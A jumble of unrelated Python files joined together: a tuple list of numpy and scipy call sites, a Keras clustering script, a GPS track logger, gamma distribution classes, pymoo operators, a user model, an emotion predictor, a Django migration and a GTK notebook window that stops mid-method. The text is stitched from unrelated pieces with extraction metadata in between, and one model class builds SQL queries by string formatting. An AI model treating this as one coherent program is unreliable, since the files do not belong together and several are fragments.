'(kl_divergence)\n', (8283, 8298), True, 'import numpy as np\n'), ((8772, 8803), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (8780, 8803), True, 'import numpy as np\n'), ((8821, 8852), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (8829, 8852), True, 'import numpy as np\n'), ((10867, 10891), 'numpy.argmin', 'np.argmin', (['kl_divergence'], {}), '(kl_divergence)\n', (10876, 10891), True, 'import numpy as np\n'), ((11448, 11470), 'numpy.random.randn', 'np.random.randn', (['(10000)'], {}), '(10000)\n', (11463, 11470), True, 'import numpy as np\n'), ((1834, 1907), 'numpy.histogram', 'np.histogram', (['blob_data'], {'bins': 'new_num_bins', 'range': '(-data_edge, data_edge)'}), '(blob_data, bins=new_num_bins, range=(-data_edge, data_edge))\n', (1846, 1907), True, 'import numpy as np\n'), ((3502, 3541), 'copy.deepcopy', 'copy.deepcopy', (['distribution[:threshold]'], {}), '(distribution[:threshold])\n', (3515, 3541), False, 'import copy\n'), ((3826, 3837), 'numpy.array', 'np.array', (['p'], {}), '(p)\n', (3834, 3837), True, 'import numpy as np\n'), ((3933, 3969), 'numpy.zeros', 'np.zeros', (['target_bin'], {'dtype': 'np.int64'}), '(target_bin, dtype=np.int64)\n', (3941, 3969), True, 'import numpy as np\n'), ((4537, 4584), 'numpy.zeros', 'np.zeros', (['sliced_nd_hist.size'], {'dtype': 'np.float64'}), '(sliced_nd_hist.size, dtype=np.float64)\n', (4545, 4584), True, 'import numpy as np\n'), ((5139, 5158), 'scipy.stats.entropy', 'stats.entropy', (['p', 'q'], {}), '(p, q)\n', (5152, 5158), False, 'from scipy import stats\n'), ((6465, 6513), 'copy.deepcopy', 'copy.deepcopy', (['distribution[loc:loc + threshold]'], {}), '(distribution[loc:loc + threshold])\n', (6478, 6513), False, 'import copy\n'), ((6863, 6874), 'numpy.array', 'np.array', (['p'], {}), '(p)\n', (6871, 6874), True, 'import numpy as np\n'), ((6970, 7006), 'numpy.zeros', 'np.zeros', (['target_bin'], {'dtype': 'np.int64'}), '(target_bin, dtype=np.int64)\n', (6978, 7006), True, 'import numpy as np\n'), ((7574, 7621), 'numpy.zeros', 'np.zeros', (['sliced_nd_hist.size'], {'dtype': 'np.float64'}), '(sliced_nd_hist.size, dtype=np.float64)\n', (7582, 7621), True, 'import numpy as np\n'), ((8176, 8195), 'scipy.stats.entropy', 'stats.entropy', (['p', 'q'], {}), '(p, q)\n', (8189, 8195), False, 'from scipy import stats\n'), ((9045, 9093), 'copy.deepcopy', 'copy.deepcopy', (['distribution[loc:loc + threshold]'], {}), '(distribution[loc:loc + threshold])\n', (9058, 9093), False, 'import copy\n'), ((9443, 9454), 'numpy.array', 'np.array', (['p'], {}), '(p)\n', (9451, 9454), True, 'import numpy as np\n'), ((9550, 9586), 'numpy.zeros', 'np.zeros', (['target_bin'], {'dtype': 'np.int64'}), '(target_bin, dtype=np.int64)\n', (9558, 9586), True, 'import numpy as np\n'), ((10154, 10201), 'numpy.zeros', 'np.zeros', (['sliced_nd_hist.size'], {'dtype': 'np.float64'}), '(sliced_nd_hist.size, dtype=np.float64)\n', (10162, 10201), True, 'import numpy as np\n'), ((10756, 10788), 'scipy.stats.wasserstein_distance', 'stats.wasserstein_distance', (['p', 'q'], {}), '(p, q)\n', (10782, 10788), False, 'from scipy import stats\n')] |
import keras
import pandas as pd
import urllib2
from bs4 import BeautifulSoup
from pprint import pprint
from matplotlib import pyplot as plt
import sys
sys.path.append('/Users/BenJohnson/projects/what-is-this/wit/')
from wit import *
pd.set_option('display.max_rows', 50)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 120)
np.set_printoptions(linewidth=100)
# --
# Config + Init
num_features = 75 # Character
# max_len = 100 # Character
max_len = 350
formatter = KerasFormatter(num_features, max_len)
# --
# Load and format data
in_store = pd.HDFStore(
'/Users/BenJohnson/projects/what-is-this/qpr/gun_leaves_20151118_v2.h5',
complevel = 9,
complib = 'bzip2'
)
source = in_store.keys()[3]
df = in_store[source]
in_store.close()
# Subset to frequent paths
chash = df.groupby('hash').apply(lambda x: len(x.obj.unique()))
keep = list(chash[chash > 100].index)
df = df[df.hash.apply(lambda x: x in keep)]
df['content'] = df.obj.apply(lambda x: BeautifulSoup(x).text.encode('utf8'))
# --
# Make all pairs
train = make_triplet_train(df, N = 600)
pd.crosstab(train.doc, train.hash)
trn, _ = formatter.format(train, ['content'], 'hash')
# Test set of all unique points
unq = df.copy()
del unq['id']
unq = unq.drop_duplicates()
awl, _ = formatter.format(unq, ['content'], 'hash')
# --
# Defining model
recurrent_size = 32
dense_size = 5
model = Sequential()
model.add(Embedding(num_features, recurrent_size))
model.add(LSTM(recurrent_size))
model.add(Dense(dense_size))
model.add(Activation('unit_norm'))
model.compile(loss = 'triplet_euclidean', optimizer = 'adam')
# --
# Training model
# Shuffles while maintaining groups
ms = modsel(train.shape[0], N = 3)
_ = model.fit(
trn['x'][0][ms], trn['x'][0][ms],
nb_epoch = 1,
batch_size = 3 * 250,
shuffle = False
)
preds = model.predict(awl['x'][0], verbose = True)
colors = awl['y'].argmax(1)
plt.scatter(preds[:,0], preds[:,1], c = colors)
plt.show()
# --
# Clustering results
#
# Could do better -- actually may want some kind of metric for "projection overlap"
from sklearn.cluster import DBSCAN
db = DBSCAN(eps = .1, min_samples = 50).fit(preds)
res = unq.hash.groupby(db.labels_).apply(lambda x: x.value_counts()).reset_index()
res.columns = ('cluster', 'hash', 'cnt')
res = res.sort('hash')
good_res = res[(res.cnt > 50) & (res.cluster > -1)]
good_res
sorted(res.hash.unique())
sorted(good_res.hash.unique())
eqv = list(good_res.groupby('cluster').hash.apply(lambda x: list(x)))
eqv = map(eval, np.unique(map(str, eqv)))
print_eqv(eqv, df)
| [
"pandas.crosstab",
"pandas.set_option",
"bs4.BeautifulSoup",
"matplotlib.pyplot.scatter",
"pandas.HDFStore",
"sys.path.append",
"sklearn.cluster.DBSCAN",
"matplotlib.pyplot.show"
] | [((154, 217), 'sys.path.append', 'sys.path.append', (['"""/Users/BenJohnson/projects/what-is-this/wit/"""'], {}), "('/Users/BenJohnson/projects/what-is-this/wit/')\n", (169, 217), False, 'import sys\n'), ((237, 274), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(50)'], {}), "('display.max_rows', 50)\n", (250, 274), True, 'import pandas as pd\n'), ((275, 316), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(500)'], {}), "('display.max_columns', 500)\n", (288, 316), True, 'import pandas as pd\n'), ((317, 352), 'pandas.set_option', 'pd.set_option', (['"""display.width"""', '(120)'], {}), "('display.width', 120)\n", (330, 352), True, 'import pandas as pd\n'), ((586, 709), 'pandas.HDFStore', 'pd.HDFStore', (['"""/Users/BenJohnson/projects/what-is-this/qpr/gun_leaves_20151118_v2.h5"""'], {'complevel': '(9)', 'complib': '"""bzip2"""'}), "(\n '/Users/BenJohnson/projects/what-is-this/qpr/gun_leaves_20151118_v2.h5',\n complevel=9, complib='bzip2')\n", (597, 709), True, 'import pandas as pd\n'), ((1112, 1146), 'pandas.crosstab', 'pd.crosstab', (['train.doc', 'train.hash'], {}), '(train.doc, train.hash)\n', (1123, 1146), True, 'import pandas as pd\n'), ((1940, 1987), 'matplotlib.pyplot.scatter', 'plt.scatter', (['preds[:, 0]', 'preds[:, 1]'], {'c': 'colors'}), '(preds[:, 0], preds[:, 1], c=colors)\n', (1951, 1987), True, 'from matplotlib import pyplot as plt\n'), ((1988, 1998), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1996, 1998), True, 'from matplotlib import pyplot as plt\n'), ((2152, 2183), 'sklearn.cluster.DBSCAN', 'DBSCAN', ([], {'eps': '(0.1)', 'min_samples': '(50)'}), '(eps=0.1, min_samples=50)\n', (2158, 2183), False, 'from sklearn.cluster import DBSCAN\n'), ((1010, 1026), 'bs4.BeautifulSoup', 'BeautifulSoup', (['x'], {}), '(x)\n', (1023, 1026), False, 'from bs4 import BeautifulSoup\n')] |
#!/usr/bin/env python3
import cereal.messaging as messaging
import os
import datetime
import signal
import threading
from common.realtime import Ratekeeper
# customisable values
GPX_LOG_PATH = '/data/media/0/gpx_logs/'
LOG_HERTZ = 10 # 10 hz = 0.1 sec, higher for higher accuracy, 10hz seems fine
LOG_LENGTH = 10 # mins, higher means it keeps more data in the memory, will take more time to write into a file too.
LOST_SIGNAL_COUNT_LENGTH = 30 # secs, output log file if we lost signal for this long
# do not change
LOST_SIGNAL_COUNT_MAX = LOST_SIGNAL_COUNT_LENGTH * LOG_HERTZ # secs,
LOGS_PER_FILE = LOG_LENGTH * 60 * LOG_HERTZ # e.g. 10 * 60 * 10 = 6000 points per file
class WaitTimeHelper:
ready_event = threading.Event()
shutdown = False
def __init__(self):
signal.signal(signal.SIGTERM, self.graceful_shutdown)
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGHUP, self.graceful_shutdown)
def graceful_shutdown(self, signum, frame):
self.shutdown = True
self.ready_event.set()
class GpxD():
def __init__(self):
self.log_count = 0
self.logs = list()
self.lost_signal_count = 0
self.wait_helper = WaitTimeHelper()
self.started_time = datetime.datetime.utcnow().isoformat()
def log(self, sm):
gps = sm['gpsLocationExternal']
# do not log when no fix or accuracy is too low, add lost_signal_count
if gps.flags % 2 == 0 or gps.accuracy > 5.:
if self.log_count > 0:
self.lost_signal_count += 1
else:
self.logs.append([datetime.datetime.utcfromtimestamp(gps.timestamp*0.001).isoformat(), str(gps.latitude), str(gps.longitude), str(gps.altitude)])
self.log_count += 1
self.lost_signal_count = 0
def write_log(self, force = False):
if self.log_count == 0:
return
if force or (self.log_count >= LOGS_PER_FILE or self.lost_signal_count >= LOST_SIGNAL_COUNT_MAX):
self._write_gpx()
self.lost_signal_count = 0
self.log_count = 0
self.logs.clear()
self.started_time = datetime.datetime.utcnow().isoformat()
def _write_gpx(self):
if len(self.logs) > 0:
if not os.path.exists(GPX_LOG_PATH):
os.makedirs(GPX_LOG_PATH)
filename = self.started_time.replace(':','-')
str = ''
str += "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\n"
str += "<gpx version=\"1.1\" creator=\"dragonpilot https://github.com/dragonpilot-community/dragonpilot\" xmlns=\"http://www.topografix.com/GPX/1/1\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd\">\n"
str += "<trk>\n"
str += " <name>" + self.started_time + "</name>"
str += " <trkseg>\n"
for trkpt in self.logs:
str += self._trkpt_template(trkpt[1], trkpt[2], trkpt[3], trkpt[0])
str += " </trkseg>\n"
str += "</trk>\n"
str += "</gpx>\n"
try:
f = open('%s%sZ.gpx' % (GPX_LOG_PATH, filename), 'w')
f.write(str)
f.close()
except:
pass
def _trkpt_template(self, lat, lon, ele, time):
str = ""
str += " <trkpt lat=\"" + lat + "\" lon=\"" + lon + "\">\n"
str += " <ele>" + ele + "</ele>\n"
str += " <time>" + time + "</time>\n"
str += " </trkpt>\n"
return str
def gpxd_thread(sm=None, pm=None):
if sm is None:
sm = messaging.SubMaster(['gpsLocationExternal'])
wait_helper = WaitTimeHelper()
gpxd = GpxD()
rk = Ratekeeper(LOG_HERTZ, print_delay_threshold=None)
while True:
sm.update(0)
gpxd.log(sm)
gpxd.write_log()
if wait_helper.shutdown:
gpxd.write_log(True)
break
rk.keep_time()
def main(sm=None, pm=None):
gpxd_thread(sm, pm)
if __name__ == "__main__":
main()
| [
"datetime.datetime.utcfromtimestamp",
"os.path.exists",
"signal.signal",
"os.makedirs",
"datetime.datetime.utcnow",
"cereal.messaging.SubMaster",
"threading.Event",
"common.realtime.Ratekeeper"
] | [((713, 730), 'threading.Event', 'threading.Event', ([], {}), '()\n', (728, 730), False, 'import threading\n'), ((3531, 3580), 'common.realtime.Ratekeeper', 'Ratekeeper', (['LOG_HERTZ'], {'print_delay_threshold': 'None'}), '(LOG_HERTZ, print_delay_threshold=None)\n', (3541, 3580), False, 'from common.realtime import Ratekeeper\n'), ((777, 830), 'signal.signal', 'signal.signal', (['signal.SIGTERM', 'self.graceful_shutdown'], {}), '(signal.SIGTERM, self.graceful_shutdown)\n', (790, 830), False, 'import signal\n'), ((835, 887), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'self.graceful_shutdown'], {}), '(signal.SIGINT, self.graceful_shutdown)\n', (848, 887), False, 'import signal\n'), ((892, 944), 'signal.signal', 'signal.signal', (['signal.SIGHUP', 'self.graceful_shutdown'], {}), '(signal.SIGHUP, self.graceful_shutdown)\n', (905, 944), False, 'import signal\n'), ((3429, 3473), 'cereal.messaging.SubMaster', 'messaging.SubMaster', (["['gpsLocationExternal']"], {}), "(['gpsLocationExternal'])\n", (3448, 3473), True, 'import cereal.messaging as messaging\n'), ((1222, 1248), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (1246, 1248), False, 'import datetime\n'), ((2148, 2176), 'os.path.exists', 'os.path.exists', (['GPX_LOG_PATH'], {}), '(GPX_LOG_PATH)\n', (2162, 2176), False, 'import os\n'), ((2186, 2211), 'os.makedirs', 'os.makedirs', (['GPX_LOG_PATH'], {}), '(GPX_LOG_PATH)\n', (2197, 2211), False, 'import os\n'), ((2044, 2070), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (2068, 2070), False, 'import datetime\n'), ((1542, 1599), 'datetime.datetime.utcfromtimestamp', 'datetime.datetime.utcfromtimestamp', (['(gps.timestamp * 0.001)'], {}), '(gps.timestamp * 0.001)\n', (1576, 1599), False, 'import datetime\n')] |
"""Gamma distribution."""
import numpy
from scipy import special
from ..baseclass import Dist
from ..operators.addition import Add
class gamma(Dist):
def __init__(self, a=1):
Dist.__init__(self, a=a)
def _pdf(self, x, a):
return x**(a-1)*numpy.e**(-x) / special.gamma(a)
def _cdf(self, x, a):
return special.gammainc(a, x)
def _ppf(self, q, a):
return special.gammaincinv(a, q)
def _mom(self, k, a):
return special.gamma(a+k)/special.gamma(a)
def _ttr(self, n, a):
return 2.*n+a, n*n+n*(a-1)
def _lower(self, a):
return 0.
def _upper(self, a):
return 40+2*a
class Gamma(Add):
"""
Gamma distribution.
Also an Erlang distribution when shape=k and scale=1./lamb.
Args:
shape (float, Dist):
Shape parameter. a>0.
scale (float, Dist):
Scale parameter. scale!=0
shift (float, Dist):
Location of the lower bound.
Examples:
>>> distribution = chaospy.Gamma(1, 1, 1)
>>> distribution
Gamma(scale=1, shape=1, shift=1)
>>> q = numpy.linspace(0,1,6)[1:-1]
>>> distribution.inv(q).round(4)
array([1.2231, 1.5108, 1.9163, 2.6094])
>>> distribution.fwd(distribution.inv(q)).round(4)
array([0.2, 0.4, 0.6, 0.8])
>>> distribution.pdf(distribution.inv(q)).round(4)
array([0.8, 0.6, 0.4, 0.2])
>>> distribution.sample(4).round(4)
array([2.0601, 1.1222, 4.0014, 1.6581])
>>> distribution.mom(1)
array(2.)
>>> distribution.ttr([1, 2, 3]).round(4)
array([[4., 6., 8.],
[1., 4., 9.]])
"""
def __init__(self, shape=1, scale=1, shift=0):
self._repr = {"shape": shape, "scale": scale, "shift": shift}
Add.__init__(self, left=gamma(shape)*scale, right=shift)
class Exponential(Add):
R"""
Exponential Probability Distribution
Args:
scale (float, Dist):
Scale parameter. scale!=0
shift (float, Dist):
Location of the lower bound.
Examples;:
>>> distribution = chaospy.Exponential(2, 3)
>>> distribution
Exponential(scale=2, shift=3)
>>> q = numpy.linspace(0,1,6)[1:-1]
>>> distribution.inv(q).round(4)
array([3.4463, 4.0217, 4.8326, 6.2189])
>>> distribution.fwd(distribution.inv(q)).round(4)
array([0.2, 0.4, 0.6, 0.8])
>>> distribution.sample(4).round(4)
array([5.1203, 3.2444, 9.0028, 4.3163])
>>> distribution.mom(1).round(4)
5.0
>>> distribution.ttr([1, 2, 3]).round(4)
array([[ 9., 13., 17.],
[ 4., 16., 36.]])
"""
def __init__(self, scale=1, shift=0):
self._repr = {"scale": scale, "shift": shift}
Add.__init__(self, left=gamma(1)*scale, right=shift)
| [
"scipy.special.gamma",
"scipy.special.gammainc",
"scipy.special.gammaincinv"
] | [((342, 364), 'scipy.special.gammainc', 'special.gammainc', (['a', 'x'], {}), '(a, x)\n', (358, 364), False, 'from scipy import special\n'), ((407, 432), 'scipy.special.gammaincinv', 'special.gammaincinv', (['a', 'q'], {}), '(a, q)\n', (426, 432), False, 'from scipy import special\n'), ((283, 299), 'scipy.special.gamma', 'special.gamma', (['a'], {}), '(a)\n', (296, 299), False, 'from scipy import special\n'), ((475, 495), 'scipy.special.gamma', 'special.gamma', (['(a + k)'], {}), '(a + k)\n', (488, 495), False, 'from scipy import special\n'), ((494, 510), 'scipy.special.gamma', 'special.gamma', (['a'], {}), '(a)\n', (507, 510), False, 'from scipy import special\n')] |
import numpy as np
import torch
from scipy.stats import truncnorm
from pymoo.factory import get_sampling, get_crossover, get_mutation
from pymoo.operators.mixed_variable_operator import MixedVariableSampling, MixedVariableMutation, MixedVariableCrossover
from pymoo.model.sampling import Sampling
class TruncatedNormalRandomSampling(Sampling):
def __init__(self, var_type=np.float):
super().__init__()
self.var_type = var_type
def _do(self, problem, n_samples, **kwargs):
return truncnorm.rvs(-2, 2, size=(n_samples, problem.n_var)).astype(np.float32)
class NormalRandomSampling(Sampling):
def __init__(self, mu=0, std=1, var_type=np.float):
super().__init__()
self.mu = mu
self.std = std
self.var_type = var_type
def _do(self, problem, n_samples, **kwargs):
return np.random.normal(self.mu, self.std, size=(n_samples, problem.n_var))
class BinaryRandomSampling(Sampling):
def __init__(self, prob=0.5):
super().__init__()
self.prob = prob
def _do(self, problem, n_samples, **kwargs):
val = np.random.random((n_samples, problem.n_var))
return (val < self.prob).astype(np.bool)
def get_operators(config):
if config.config == "DeepMindBigGAN256" or config.config == "DeepMindBigGAN512":
mask = ["real"]*config.dim_z + ["bool"]*config.num_classes
real_sampling = None
if config.config == "DeepMindBigGAN256" or config.config == "DeepMindBigGAN512":
real_sampling = TruncatedNormalRandomSampling()
sampling = MixedVariableSampling(mask, {
"real": real_sampling,
"bool": BinaryRandomSampling(prob=5/1000)
})
crossover = MixedVariableCrossover(mask, {
"real": get_crossover("real_sbx", prob=1.0, eta=3.0),
"bool": get_crossover("bin_hux", prob=0.2)
})
mutation = MixedVariableMutation(mask, {
"real": get_mutation("real_pm", prob=0.5, eta=3.0),
"bool": get_mutation("bin_bitflip", prob=10/1000)
})
return dict(
sampling=sampling,
crossover=crossover,
mutation=mutation
)
elif config.config.split("_")[0] == "StyleGAN2":
return dict(
sampling=NormalRandomSampling(),
crossover=get_crossover("real_sbx", prob=1.0, eta=3.0),
mutation=get_mutation("real_pm", prob=0.5, eta=3.0)
)
elif config.config.split("_")[0] == "Adaily":
return dict(
sampling=NormalRandomSampling(),
crossover=get_crossover("real_sbx", prob=1.0, eta=3.0),
mutation=get_mutation("real_pm", prob=0.5, eta=3.0)
)
elif config.config == "GPT2":
return dict(
sampling=get_sampling("int_random"),
crossover=get_crossover("int_sbx", prob=1.0, eta=3.0),
mutation=get_mutation("int_pm", prob=0.5, eta=3.0)
)
else:
raise Exception("Unknown config")
| [
"numpy.random.normal",
"numpy.random.random",
"pymoo.factory.get_mutation",
"pymoo.factory.get_sampling",
"pymoo.factory.get_crossover",
"scipy.stats.truncnorm.rvs"
] | [((851, 919), 'numpy.random.normal', 'np.random.normal', (['self.mu', 'self.std'], {'size': '(n_samples, problem.n_var)'}), '(self.mu, self.std, size=(n_samples, problem.n_var))\n', (867, 919), True, 'import numpy as np\n'), ((1109, 1153), 'numpy.random.random', 'np.random.random', (['(n_samples, problem.n_var)'], {}), '((n_samples, problem.n_var))\n', (1125, 1153), True, 'import numpy as np\n'), ((514, 567), 'scipy.stats.truncnorm.rvs', 'truncnorm.rvs', (['(-2)', '(2)'], {'size': '(n_samples, problem.n_var)'}), '(-2, 2, size=(n_samples, problem.n_var))\n', (527, 567), False, 'from scipy.stats import truncnorm\n'), ((1785, 1829), 'pymoo.factory.get_crossover', 'get_crossover', (['"""real_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('real_sbx', prob=1.0, eta=3.0)\n", (1798, 1829), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((1851, 1885), 'pymoo.factory.get_crossover', 'get_crossover', (['"""bin_hux"""'], {'prob': '(0.2)'}), "('bin_hux', prob=0.2)\n", (1864, 1885), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((1967, 2009), 'pymoo.factory.get_mutation', 'get_mutation', (['"""real_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('real_pm', prob=0.5, eta=3.0)\n", (1979, 2009), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2031, 2074), 'pymoo.factory.get_mutation', 'get_mutation', (['"""bin_bitflip"""'], {'prob': '(10 / 1000)'}), "('bin_bitflip', prob=10 / 1000)\n", (2043, 2074), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2352, 2396), 'pymoo.factory.get_crossover', 'get_crossover', (['"""real_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('real_sbx', prob=1.0, eta=3.0)\n", (2365, 2396), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2419, 2461), 'pymoo.factory.get_mutation', 'get_mutation', (['"""real_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('real_pm', prob=0.5, eta=3.0)\n", (2431, 2461), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2611, 2655), 'pymoo.factory.get_crossover', 'get_crossover', (['"""real_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('real_sbx', prob=1.0, eta=3.0)\n", (2624, 2655), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2678, 2720), 'pymoo.factory.get_mutation', 'get_mutation', (['"""real_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('real_pm', prob=0.5, eta=3.0)\n", (2690, 2720), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2808, 2834), 'pymoo.factory.get_sampling', 'get_sampling', (['"""int_random"""'], {}), "('int_random')\n", (2820, 2834), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2858, 2901), 'pymoo.factory.get_crossover', 'get_crossover', (['"""int_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('int_sbx', prob=1.0, eta=3.0)\n", (2871, 2901), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2924, 2965), 'pymoo.factory.get_mutation', 'get_mutation', (['"""int_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('int_pm', prob=0.5, eta=3.0)\n", (2936, 2965), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n')] |
class UserModel(Table):
def __init__(self):
self.tableName = "User"
self.requiredFields = ['firstName', 'lastName', 'username', 'password']
self.optionalFields = ['email']
def check(self, data):
for req in self.requiredFields:
if req not in data:
return False
for opt in self.optionalFields:
if opt not in data:
data[opt] = ""
return data
def getById(self, id):
rows = self.select([
"id LIKE {}".format(id)
])
if rows:
return rows[0]
else:
None
def getByUsername(self, username):
rows = self.select([
"username LIKE '{}'".format(username)
])
if rows:
return rows[0]
else:
None
def add(self, data):
import bcrypt
data = self.check(data)
if not data:
return False
data['password'] = bcrypt.hashpw(data['password'].encode("utf-8"), bcrypt.gensalt()).decode("utf-8")
self.insert(data)
| [
"bcrypt.gensalt"
] | [((816, 832), 'bcrypt.gensalt', 'bcrypt.gensalt', ([], {}), '()\n', (830, 832), False, 'import bcrypt\n')] |
import config as cfg
import cv2
import numpy as np
from keras.models import load_model
from keras.preprocessing.image import img_to_array
from keras import backend as K
import tensorflow as tf
import keras
'''
esto es necesario para que no haya errores a la hora de exponer el servicio con flask
info --> https://github.com/tensorflow/tensorflow/issues/28287#issuecomment-495005162
'''
from keras.backend import set_session
sess = tf.Session()
graph = tf.get_default_graph()
set_session(sess)
model_emotions = load_model(cfg.path_model)
class predict_emotions():
'''
def __init__(self):
# cargo modelo de deteccion de emociones
global graph
self.graph = tf.get_default_graph()
self.model_emotions = load_model(cfg.path_model)
'''
def preprocess_img(self,face_image,rgb=True,w=48,h=48):
face_image = cv2.resize(face_image, (w,h))
if rgb == False:
face_image = cv2.cvtColor(face_image, cv2.COLOR_BGR2GRAY)
face_image = face_image.astype("float") / 255.0
face_image= img_to_array(face_image)
face_image = np.expand_dims(face_image, axis=0)
return face_image
def get_emotion(self,img,boxes_face):
emotions = []
if len(boxes_face)!=0:
for box in boxes_face:
y0,x0,y1,x1 = box
face_image = img[x0:x1,y0:y1]
# preprocesar data
face_image = self.preprocess_img(face_image ,cfg.rgb, cfg.w, cfg.h)
# predecir imagen
global sess
global graph
with graph.as_default():
set_session(sess)
prediction = model_emotions.predict(face_image)
emotion = cfg.labels[prediction.argmax()]
emotions.append(emotion)
else:
emotions = []
boxes_face = []
return boxes_face,emotions
| [
"keras.preprocessing.image.img_to_array",
"keras.models.load_model",
"tensorflow.Session",
"keras.backend.set_session",
"numpy.expand_dims",
"cv2.cvtColor",
"cv2.resize",
"tensorflow.get_default_graph"
] | [((432, 444), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (442, 444), True, 'import tensorflow as tf\n'), ((453, 475), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (473, 475), True, 'import tensorflow as tf\n'), ((477, 494), 'keras.backend.set_session', 'set_session', (['sess'], {}), '(sess)\n', (488, 494), False, 'from keras.backend import set_session\n'), ((512, 538), 'keras.models.load_model', 'load_model', (['cfg.path_model'], {}), '(cfg.path_model)\n', (522, 538), False, 'from keras.models import load_model\n'), ((860, 890), 'cv2.resize', 'cv2.resize', (['face_image', '(w, h)'], {}), '(face_image, (w, h))\n', (870, 890), False, 'import cv2\n'), ((1061, 1085), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['face_image'], {}), '(face_image)\n', (1073, 1085), False, 'from keras.preprocessing.image import img_to_array\n'), ((1107, 1141), 'numpy.expand_dims', 'np.expand_dims', (['face_image'], {'axis': '(0)'}), '(face_image, axis=0)\n', (1121, 1141), True, 'import numpy as np\n'), ((940, 984), 'cv2.cvtColor', 'cv2.cvtColor', (['face_image', 'cv2.COLOR_BGR2GRAY'], {}), '(face_image, cv2.COLOR_BGR2GRAY)\n', (952, 984), False, 'import cv2\n'), ((1650, 1667), 'keras.backend.set_session', 'set_session', (['sess'], {}), '(sess)\n', (1661, 1667), False, 'from keras.backend import set_session\n')] |
# Generated by Django 2.2.1 on 2020-03-10 18:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gui', '0013_auto_20200310_1742'),
]
operations = [
migrations.AddField(
model_name='feedback',
name='childprotection',
field=models.TextField(blank=True, max_length=1000, verbose_name='Kinderschutzrelevante Information'),
),
]
| [
"django.db.models.TextField"
] | [((341, 441), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)', 'verbose_name': '"""Kinderschutzrelevante Information"""'}), "(blank=True, max_length=1000, verbose_name=\n 'Kinderschutzrelevante Information')\n", (357, 441), False, 'from django.db import migrations, models\n')] |
# Copyright 2008-2009 <NAME>
#
# This file is part of Reinteract and distributed under the terms
# of the BSD license. See the file COPYING in the Reinteract
# distribution for full details.
#
########################################################################
import gtk
import os
from base_notebook_window import BaseNotebookWindow
from file_list import FileList
from format_escaped import format_escaped
from notebook import NotebookFile, WorksheetFile, LibraryFile
from save_file import SaveFileBuilder
gtk.rc_parse_string(
"""
style "notebook-close-button" {
GtkWidget::focus-line-width = 0
GtkWidget::focus-padding = 0
GtkButton::inner-border = { 0, 0, 0, 0 }
}
widget "*.notebook-close-button" style : highest "notebook-close-button"
""")
class NotebookWindow(BaseNotebookWindow):
UI_STRING="""
<ui>
<menubar name="TopMenu">
<menu action="file">
<menuitem action="new-notebook"/>
<menuitem action="open-notebook"/>
<menuitem action="notebook-properties"/>
<separator/>
<menuitem action="new-worksheet"/>
<menuitem action="new-library"/>
<menuitem action="open"/>
<menuitem action="save"/>
<menuitem action="rename"/>
<menuitem action="close"/>
<separator/>
<menuitem action="quit"/>
</menu>
<menu action="edit">
<menuitem action="cut"/>
<menuitem action="copy"/>
<menuitem action="copy-as-doctests"/>
<menuitem action="paste"/>
<menuitem action="delete"/>
<separator/>
<menuitem action="calculate"/>
<menuitem action="calculate-to-line"/>
<menuitem action="break"/>
<separator/>
<menuitem action="calculate-all"/>
<separator/>
<menuitem action="preferences"/>
</menu>
<menu action="help">
<menuitem action="about"/>
</menu>
</menubar>
<toolbar name="ToolBar">
<toolitem action="save"/>
<separator/>
<toolitem action="calculate"/>
<toolitem action="break"/>
</toolbar>
</ui>
"""
def __init__(self, notebook):
BaseNotebookWindow.__init__(self, notebook)
self.window.set_default_size(800, 800)
#######################################################
# Overrides
#######################################################
def _fill_content(self):
hpaned = gtk.HPaned()
position = self.state.get_pane_position()
if position == -1:
hpaned.set_position(200)
else:
hpaned.set_position(position)
hpaned.connect('notify::position', self.on_hpaned_notify_position)
self.main_vbox.pack_start(hpaned, expand=True, fill=True)
scrolled_window = gtk.ScrolledWindow()
scrolled_window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
hpaned.pack1(scrolled_window, resize=False)
self.__file_list = FileList(self.notebook)
scrolled_window.add(self.__file_list)
self.__file_list.connect('open-file', self.on_file_list_open_file)
self.__file_list.connect('close-file', self.on_file_list_close_file)
